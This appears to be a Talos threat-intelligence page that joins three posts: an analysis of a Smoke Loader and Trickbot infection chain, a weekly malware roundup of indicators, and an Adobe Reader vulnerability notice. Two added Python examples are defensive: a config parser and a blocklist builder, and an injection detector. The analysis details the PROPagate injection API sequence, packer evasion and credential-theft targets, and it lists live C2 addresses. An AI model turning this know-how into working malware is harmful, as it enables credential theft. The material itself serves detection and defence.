    Smoking Guns - Smoke Loader learned new tricks

    This post is authored by Ben Baker and Holger Unterbrink

    Overview


    Cisco Talos has been tracking a new version of Smoke Loader — a malicious application that can be used to load other malware — for the past several months following an alert from Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine. AMP successfully stopped the malware before it was able to infect the host, but further analysis showed some developments in the Smoke Loader sample resulting from this chain of malware that intrigued us. This includes one of the first uses of the PROPagate injection technique in real-world malware. Besides a report released at the end of last week describing a different RIG Exploit Kit-based campaign, we haven’t seen real-world malware using this.

    Talos is very familiar with Smoke Loader. For example, it was used as a downloader for a cyberattack that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM) in January.

    Similar to many other campaigns, the initial infection vector was an email with a malicious Microsoft Word document attached. The victims were tricked into opening the attachment and enabling the embedded macros. This started the malware-downloading chain, down to the final Smoke Loader infection and its plugins.

    Smoke Loader is primarily used as a downloader to drop and execute additional malware like ransomware or cryptocurrency miners. Actors using Smoke Loader botnets have posted on malware forums attempting to sell third-party payload installs. This sample of Smoke Loader did not transfer any additional executables, suggesting that it may not be as popular as it once was, or it’s only being used for private purposes.

    The plugins are all designed to steal sensitive information from the victim, specifically targeting stored credentials or sensitive information transferred over a browser — including Windows and Team Viewer credentials, email logins, and others.


    Technical details

    Infection Chain

    As mentioned above, the infection chain started with an email and an attached malicious Word document (b98abdbdb85655c64617bb6515df23062ec184fe88d2d6a898b998276a906ebc). You can see the content of this email below.

    Fig. 1 - Phishing Email

    The attached Word document had an embedded macro that initiated the second stage and downloaded the Trickbot malware (0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41).

    Fig. 2 - Email attachment: IO08784413.doc

    This document downloads and executes the Trickbot malware from hxxp://5[.]149[.]253[.]100/sg3.exe, or hxxp://185[.]117[.]88[.]96/sg3.exe as %TEMP%\[a-zA-Z]{6-9}.exe. These URLs have served up multiple malicious executables in the past, including samples of Trickbot.

    In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan (b65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40), which installed five additional Smoke Loader plugins. We describe these plugins in detail in the plugins section of this report below.

    Trickbot

    (0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41)

    Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers. We haven’t analysed the Trickbot sample further, but for your reference, we are providing the Trickbot configuration here (IP addresses redacted with bracketed dots for security reasons):

    <mcconf>
    <ver>1000167</ver>
    <gtag>wrm13</gtag>

    <srv>185[.]174[.]173[.]34:443</srv>
    <srv>162[.]247[.]155[.]114:443</srv>
    <srv>185[.]174[.]173[.]116:443</srv>
    <srv>185[.]174[.]173[.]241:443</srv>
    <srv>62[.]109[.]26[.]121:443</srv>
    <srv>185[.]68[.]93[.]27:443</srv>
    <srv>137[.]74[.]151[.]148:443</srv>
    <srv>185[.]223[.]95[.]66:443</srv>
    <srv>85[.]143[.]221[.]60:443</srv>
    <srv>195[.]123[.]216[.]115:443</srv>
    <srv>94[.]103[.]82[.]216:443</srv>
    <srv>185[.]20[.]187[.]13:443</srv>
    <srv>185[.]242[.]179[.]118:443</srv>
    <srv>62[.]109[.]26[.]208:443</srv>
    <srv>213[.]183[.]51[.]54:443</srv>
    <srv>62[.]109[.]24[.]176:443</srv>
    <srv>62[.]109[.]27[.]196:443</srv>
    <srv>185[.]174[.]174[.]156:443</srv>
    <srv>37[.]230[.]112[.]146:443</srv>
    <srv>185[.]174[.]174[.]72:443</srv>
    </servs>
    <autorun>
    <module name="systeminfo" ctl="GetSystemInfo"/>
    <module name="injectDll"/>
    </autorun>
    </mcconf>
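    As an added example (not part of the Talos post and not Trickbot's own code), a tolerant parser for this <mcconf> layout: it pulls out the version, gtag, C2 list and autorun modules, refangs the bracketed dots, validates each address, and copes with the unmatched </servs> tag seen above, which a strict XML parser would reject. The sample input is a trimmed copy of the configuration, constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample input: a trimmed copy of the Trickbot <mcconf> quoted in the
# post. As on the page, the <srv> list is closed by </servs> with no matching
# opening tag, so a strict XML parser rejects it; this parser tolerates that.
SAMPLE_MCCONF = """<mcconf>
<ver>1000167</ver>
<gtag>wrm13</gtag>

<srv>185[.]174[.]173[.]34:443</srv>
<srv>162[.]247[.]155[.]114:443</srv>
<srv>62[.]109[.]26[.]121:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>"""


@dataclass
class TrickbotConfig:
    version: str
    gtag: str        # campaign / group tag
    servers: list    # [(ip_str, port), ...] with IPs refanged
    modules: list    # [{"name": ..., "ctl": ...}, ...] taken from <autorun>


_TAG_RE = {
    "ver": re.compile(r"<ver>\s*(.*?)\s*</ver>", re.S),
    "gtag": re.compile(r"<gtag>\s*(.*?)\s*</gtag>", re.S),
}
_SRV_RE = re.compile(r"<srv>\s*([^<]+?)\s*:\s*(\d{1,5})\s*</srv>")
_MODULE_RE = re.compile(r"<module\s+([^>]*?)\s*/>")
_ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def refang(defanged: str) -> str:
    """Turn the post's '185[.]174[.]173[.]34' notation back into a dotted quad."""
    return defanged.replace("[.]", ".")


def parse_mcconf(text: str) -> TrickbotConfig:
    """Extract version, gtag, C2 list and autorun modules from an <mcconf> blob."""
    if "<mcconf>" not in text or "</mcconf>" not in text:
        raise ValueError("not an <mcconf> document")
    fields = {}
    for key, rx in _TAG_RE.items():
        m = rx.search(text)
        if not m:
            raise ValueError(f"missing <{key}> element")
        fields[key] = m.group(1)

    servers = []
    for host, port in _SRV_RE.findall(text):
        ip = refang(host)
        # A malformed entry is more likely a parsing slip than a real C2 and must
        # not end up on a blocklist, so reject it instead of passing it through.
        try:
            ipaddress.IPv4Address(ip)
        except ipaddress.AddressValueError as exc:
            raise ValueError(f"bad <srv> address {host!r}") from exc
        port_n = int(port)
        if not 1 <= port_n <= 65535:
            raise ValueError(f"bad <srv> port {port!r}")
        servers.append((ip, port_n))

    modules = [dict(_ATTR_RE.findall(attrs)) for attrs in _MODULE_RE.findall(text)]
    return TrickbotConfig(fields["ver"], fields["gtag"], servers, modules)


def c2_blocklist(cfg: TrickbotConfig) -> list:
    """Unique 'ip:port' strings, sorted, ready for a firewall or proxy denylist."""
    return sorted({f"{ip}:{port}" for ip, port in cfg.servers})


if __name__ == "__main__":
    cfg = parse_mcconf(SAMPLE_MCCONF)
    print(f"Trickbot v{cfg.version} gtag={cfg.gtag}")
    print("autorun modules:", [m["name"] for m in cfg.modules])
    print("\n".join(c2_blocklist(cfg)))
```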


    Smoke Loader packer/injector details

    Malware frequently iterates through process lists to find a process to inject. Security researchers know this process well and have created many tools to track the Windows APIs used in this technique, like CreateToolhelp32Snapshot. This Smoke Loader sample avoids iterating through process lists by calling the Windows API GetShellWindow to get a handle to the shell’s desktop window, then calling GetWindowThreadProcessId to get the process ID of Explorer.exe.

    Smoke Loader then uses standard injection API to create and write two memory sections in Explorer, one for shellcode and another for a UxSubclassInfo structure to be used later for PROPagate injection.

    GetShellWindow -> GetWindowThreadProcessId -> NtOpenProcess -> NtCreateSection -> NtMapViewOfSection x2 -> NtUnmapViewOfSection

    The window handle retrieved from the previous call to GetShellWindow has a second purpose. Smoke Loader uses EnumChildWindows to iterate through each of the handle’s child windows to find one containing the property UxSubclassInfo, which indicates it is vulnerable to PROPagate injection.

    PROPagate injection was first described by a security researcher in late 2017, though there were no public POCs available when Smoke Loader started using it. The Smoke Loader developers likely used publicly available notes on PROPagate to recreate the technique.

    Fig. 3 - PROPagate Injection

    For each child window, the injector calls EnumPropsA to iterate through window properties until it finds UxSubclassInfo. This function also showcases some of the anti-analysis techniques employed by this sample’s packer. There are several unnecessary jumps for control flow obfuscation, including simple opaque predicates leading to junk code.

    “Deobf_next_chunk” takes arguments for size and offset for the next chunk of code to deobfuscate and execute, so the bulk of the malicious code is deobfuscated as needed, and can be obfuscated again once the next chunk is loaded. The obfuscation method is a simple one-byte XOR with the same hardcoded value for every piece.

    These anti-analysis techniques are accompanied by anti-debugging and anti-VM checks, as well as threads dedicated to scanning for processes and windows belonging to analysis tools. These features complicate forensics, runtime AV scanners, tracing, and debugging.

    Fig. 4 - Trigger malicious event handler via WM_NOTIFY and WM_PAINT

    Once the shellcode and UxSubclassInfo data are written to the remote process, the injector calls SetPropA to update the property for the window, then sends WM_NOTIFY and WM_PAINT messages to the target window to force it to trigger the malicious event handler that executes the injected shellcode.
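    The call chain described above gives a defender a concrete signal: a process setting UxSubclassInfo on a window it does not own and then sending that window WM_NOTIFY or WM_PAINT. The following detection is an added example, not Talos tooling; it runs over a constructed API trace in an assumed "key=value" line format and reports cross-process PROPagate-style injection while ignoring the in-process subclassing that legitimate software performs.

```python
import re
from collections import defaultdict

# Constructed sample API trace (not real sandbox output). Assumed format: one call
# per line, "pid=<caller> proc=<image> api=<name> key=value ...". The first block
# mirrors the call chain the post describes; the last two lines are benign
# in-process subclassing by explorer.exe itself, which must not be flagged.
SAMPLE_TRACE = """\
pid=4120 proc=dropper.exe api=GetShellWindow hwnd=0x10010
pid=4120 proc=dropper.exe api=GetWindowThreadProcessId hwnd=0x10010 target_pid=1852
pid=4120 proc=dropper.exe api=NtOpenProcess target_pid=1852
pid=4120 proc=dropper.exe api=NtCreateSection size=0x3000
pid=4120 proc=dropper.exe api=NtMapViewOfSection target_pid=4120
pid=4120 proc=dropper.exe api=NtMapViewOfSection target_pid=1852
pid=4120 proc=dropper.exe api=NtUnmapViewOfSection target_pid=4120
pid=4120 proc=dropper.exe api=EnumChildWindows hwnd=0x10010
pid=4120 proc=dropper.exe api=EnumPropsA hwnd=0x20044 owner_pid=1852
pid=4120 proc=dropper.exe api=SetPropA hwnd=0x20044 owner_pid=1852 prop=UxSubclassInfo
pid=4120 proc=dropper.exe api=SendMessageA hwnd=0x20044 owner_pid=1852 msg=WM_NOTIFY
pid=4120 proc=dropper.exe api=SendMessageA hwnd=0x20044 owner_pid=1852 msg=WM_PAINT
pid=2210 proc=explorer.exe api=SetPropA hwnd=0x20080 owner_pid=2210 prop=UxSubclassInfo
pid=2210 proc=explorer.exe api=SendMessageA hwnd=0x20080 owner_pid=2210 msg=WM_PAINT
"""

_KV_RE = re.compile(r"(\w+)=(\S+)")
TRIGGER_MSGS = {"WM_NOTIFY", "WM_PAINT"}  # messages the post says fire the handler


def parse_line(line):
    """Split one trace line into a dict; pid-valued fields become ints."""
    ev = dict(_KV_RE.findall(line))
    for key in ("pid", "target_pid", "owner_pid"):
        if key in ev:
            ev[key] = int(ev[key])
    return ev


def detect_propagate(lines):
    """Alert when a caller sets UxSubclassInfo on a window owned by another process
    and then sends that window WM_NOTIFY or WM_PAINT. Confidence is 'high' if the
    caller had also mapped a section into the window's owner (shellcode staged)."""
    remote_maps = defaultdict(set)   # caller pid -> pids it mapped sections into
    tainted = defaultdict(dict)      # caller pid -> {hwnd: owner pid}
    alerts = []
    for raw in lines:
        if not raw.strip():
            continue
        ev = parse_line(raw)
        pid, api = ev["pid"], ev["api"]
        if api == "NtMapViewOfSection" and ev.get("target_pid", pid) != pid:
            remote_maps[pid].add(ev["target_pid"])
        elif api in ("SetPropA", "SetPropW") and ev.get("prop") == "UxSubclassInfo":
            owner = ev.get("owner_pid", pid)
            if owner != pid:             # legitimate comctl32 subclassing is in-process
                tainted[pid][ev["hwnd"]] = owner
        elif api.startswith(("SendMessage", "PostMessage")):
            hwnd = ev.get("hwnd")
            if ev.get("msg") in TRIGGER_MSGS and hwnd in tainted[pid]:
                owner = tainted[pid].pop(hwnd)   # report each tainted window once
                alerts.append({
                    "caller_pid": pid,
                    "caller": ev.get("proc", "?"),
                    "target_pid": owner,
                    "hwnd": hwnd,
                    "trigger": ev["msg"],
                    "confidence": "high" if owner in remote_maps[pid] else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_propagate(SAMPLE_TRACE.splitlines()):
        print(alert)
```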

    Injected shellcode: Smoke Loader

    Smoke Loader received five interesting plugins instead of additional payloads. Each plugin was given its own Explorer.exe process to execute in, and the malware used older techniques to inject each plugin into these processes. Each Explorer.exe process is created with the option CREATE_SUSPENDED, the shellcode is injected, then executed using ResumeThread. This is noisy and leaves six Explorer.exe processes running on the infected machine.

    Plugins

    As mentioned above, the plugins are all designed to steal sensitive information from the victim, explicitly targeting stored credentials or sensitive information transferred over a browser. Each plugin uses the mutex "opera_shared_counter" to ensure multiple plugins don’t inject code into the same process at the same time.

    Plugin 1:

    This is the largest plugin with approximately 2,000 functions. It contains a statically linked SQLite library for reading local database files.

    • It targets stored info for Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird.
    • Recursively searches for files named logins.json which it parses for hostname, encryptedUsername, and encryptedPassword.
    • vaultcli.dll - Windows Credential Manager
    • POP3, SMTP, IMAP Credentials

    Plugin 2:

    This plugin recursively searches through directories looking for files to parse and exfiltrate.

    • Outlook
      • *.pst
      • *.ost
    • Thunderbird
      • *.mab
      • *.msf
      • inbox
      • sent
      • templates
      • drafts
      • archives
    • The Bat!
      • *.tbb
      • *.tbn
      • *.abd

    Plugin 3:

    This one injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS.

    • If "fgclearcookies" is set, kills browser processes and deletes cookies.
    • iexplore.exe and microsoftedgecp.exe
      • HttpSendRequestA
      • HttpSendRequestW
      • InternetWriteFile
    • firefox.exe
      • PR_Write in nspr4.dll or nss3.dll
    • chrome.exe
      • unknown function inside chrome.dll
    • opera.exe
      • unknown function inside opera_browser.dll or opera.dll

    Plugin 4:

    This hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for FTP, SMTP, POP3, and IMAP.

    Plugin 5:

    This one injects code into TeamViewer.exe to steal credentials.

    IOC


    b98abdbdb85655c64617bb6515df23062ec184fe88d2d6a898b998276a906ebc (IO08784413.doc)
    0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41 (Trickbot)
    b65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40 (Smoke Loader)

    Mutex: opera_shared_counter

    Trickbot IPs: identical to the <srv> entries in the Trickbot configuration quoted above.

    Smoke Loader domains:
    ukcompany[.]me
    ukcompany[.]pw
    ukcompany[.]top

    Dropped File: %appdata%\Microsoft\Windows\[a-z]{8}\[a-z]{8}.exe

    Scheduled Task: Opera scheduled Autoupdate [0-9]{1-10}


    Conclusion


    We have seen that the trojan and botnet market is constantly changing. The players continuously improve their quality and techniques, modifying them on an ongoing basis to bypass security tools. This clearly shows how important it is to keep all systems up to date. Organizations can use a multi-layered defensive approach to detect and protect against these kinds of threats. Talos continues to monitor these campaigns as they evolve to ensure that defenses protect our customers. We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery from any such attack.

    Coverage


    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


    Threat Roundup for June 29 to July 6th


    Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we've observed this week — covering the dates between June 29 and July 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

    As a reminder, the information provided for the following threats in this post is non-exhaustive, and is current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

    The most prevalent threats highlighted in this roundup are:

    • Win.Malware.Separ-6598261-0
      Malware
      Separ is spyware that has been delivered via several different spam campaigns. The malware establishes persistence to survive system reboots, and it's able to collect sensitive information by capturing login attempts via a web browser. It disables the Windows firewall if present, propagates and invokes scripts during runtime, and relies on FTP to upload any collected data.
       
    • Win.Malware.Daqc-6598201-0
      Malware
      Daqc is a trojan that collects sensitive information from the infected host and exfiltrates pieces of the collected data over time to a command and control (C2) server. It drops several database files and locks files to properly manage the data it has collected or is queued to collect at a future time.
       
    • Win.Malware.Tspy-6598050-0
      Malware
      Tspy is a trojan with several functionalities. It establishes system persistence to survive reboots. It also contacts domains that are related to remote access trojans (RATs) and are also known to host C2 servers that send additional commands to the malware. The samples are often packed and contain anti-debug features intended to delay manual analysis.
       
    • Win.Malware.Fareit-6597973-0
      Malware
      Fareit is a trojan with a significant history associated with malware distribution. It is mainly an information-stealer and malware downloader network that installs other malware on infected machines.
       
    • Win.Malware.Razy-6596077-0
      Malware
      Razy is oftentimes a generic detection name for a Windows trojan. Although more recent cases have found it attributed to ransomware that uses the .razy file extension when writing encrypted files to disk, these samples are the former case. They collect sensitive information from the infected host, format and encrypt the data, and send it to a C2 server.
       
    • Win.Malware.Zusy-6596071-0
      Malware
      Zusy is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
       

    Threats

    Win.Malware.Separ-6598261-0


    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
      • Value Name: lodhgyuuuf
    Mutexes
    • 716BCAD1::WK
    • DILLOCREATE
    • 4C0::DA783779D0
    IP Addresses
    • 198.23.57.8
    Domain Names
    • ftp.freehostia.com
    Files and or directories created
    • ZREA.vbs
    • nimiki09.vbs
    • enikiol03.bat
    • enikiol02.bat
    • BReader.exe
    • %AppData%\Local\4Adobe\4low
    • %AppData%\Adobe\Adobe INC\AadobeRead\BReader.exe
    • %AppData%\Adobe\Adobe INC\AadobeRead\Adobeta.exe
    • %AppData%\Adobe\Adobe INC
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella




    Win.Malware.Daqc-6598201-0


    Indicators of Compromise


    Registry Keys
    • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • necter7.ru
    Files and or directories created
    • %AppData%\mvsh\sghbn.exe
    • %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\mvsh.vbs
    • %AppData%\D282E1\1E80C5.lck
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella




    Win.Malware.Tspy-6598050-0


    Indicators of Compromise


    Registry Keys
    • N/A
    Mutexes
    • 3749282D282E1E80C56CAE5A
    IP Addresses
    • 31.220.56.187
    Domain Names
    • N/A
    Files and/or directories created
    • \PC*\MAILSLOT\NET\NETLOGON
    • %AppData%\D282E1\1E80C5.lck
    • %AppData%\D282E1
    File Hashes

    Coverage

    Screenshots of Detection (AMP, ThreatGrid)

    Win.Malware.Fareit-6597973-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
      • Value Name: J2UXTX7H4BT
    Mutexes
    • AE7ED74491CA89C0FD1212B015FD0F24
    • 922ORSE7XC24WH0Z
    • 8-3503835SZBFHHZ
    IP Addresses
    • 98.124.199.96
    • 50.97.212.250
    • 38.18.228.192
    • 23.247.23.36
    Domain Names
    Files and/or directories created
    • %LocalAppData%\Temp\rhvh0.exe
    • %AppData%\922ORSE7\922logrv.ini
    • %AppData%\922ORSE7\922logri.ini
    • %AppData%\922ORSE7\922logim.jpeg
    • %AppData%\922ORSE7
    File Hashes

    Coverage

    Screenshots of Detection (AMP, ThreatGrid, Umbrella)


    Win.Malware.Razy-6596077-0


    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    Mutexes
    • WmiApRpl_Perf_Library_Lock_PID_968
    • Windows Workflow Foundation 4.0.0.0_Perf_Library_Lock_PID_968
    • ServiceModelOperation 3.0.0.0_Perf_Library_Lock_PID_968
    • PerfNet_Perf_Library_Lock_PID_968
    • Outlook_Perf_Library_Lock_PID_968
    IP Addresses
    • 107.180.26.90
    Domain Names
    • asli-id.com
    Files and/or directories created
    • %LocalAppData%\Temp\Ph4.exe
    • %AppData%\K-Mart Corp\K-Mart Corp.exe
    • %AppData%\K-Mart Corp
    File Hashes

    Coverage

    Screenshots of Detection (AMP, ThreatGrid, Umbrella)


    Win.Malware.Zusy-6596071-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
      • Value Name: internat.exe
    Mutexes
    • Sandboxie_SingleInstanceMutex_Control
    • Frz_State
    IP Addresses
    • 47.74.230.86
    • 176.9.193.212
    Domain Names
    • ffmovne.top
    Files and/or directories created
    • %LocalAppData%\Temp\Non-resident RunPE Loader(1).exe
    • %LocalAppData%\Temp\flashplayer30_xa_install(2).exe
    • %LocalAppData%\Temp\upd63bc908e.bat
    • %LocalAppData%\Adobe\83474DC8-60A7-4AE9-9182-F2D369E40051
    • %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\bookmarks-2017-10-03.wyz
    File Hashes

    Coverage

    Screenshots of Detection (AMP, ThreatGrid, Umbrella)


    Vulnerability Spotlight: Multiple Adobe Acrobat DC Remote Code Execution Vulnerabilities


    Discovered by Aleksandar Nikolic of Cisco Talos

    Overview

    Today, Talos is releasing details of new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities.

    TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)

    Specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

    TALOS-2018-0590 - Adobe Acrobat Reader DC Collab newWrStreamToCosObj Remote Code Execution Vulnerability (CVE-2018-12756)

    Specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

    TALOS-2018-0592 - Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability (CVE-2018-12815)

    Specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

    Known vulnerable versions

    Adobe Acrobat Reader DC 2018.011.20038

    Coverage

    The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

    Snort Rules: 46292-46293, 46550-46551, 46634-46635
